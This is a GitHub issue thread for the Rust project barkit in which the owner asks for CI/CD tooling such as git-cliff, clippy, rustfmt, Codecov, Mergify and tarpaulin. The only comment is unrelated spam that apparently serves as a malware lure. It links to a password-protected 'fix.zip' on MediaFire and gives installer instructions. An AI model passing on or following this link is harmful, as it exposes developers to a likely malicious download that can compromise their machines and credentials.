### ISSUE TITLE
Add CI/CD

### ISSUE THREAD

**Issue by nsyzrantsev** [nsyzrantsev/barkit#3]
Add configs and code to run changelog generator, linter, formatter and other necessary tools:

* [git cliff](https://github.com/orhun/git-cliff)
* [rust clippy](https://github.com/rust-lang/rust-clippy)
* [rustfmt](https://github.com/rust-lang/rustfmt)
* [Codecov](https://about.codecov.io/) (see https://github.com/codecov/example-rust)
* [Mergify](https://mergify.com/)
* cargo publish
* [tarpaulin](https://github.com/xd009642/tarpaulin)

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
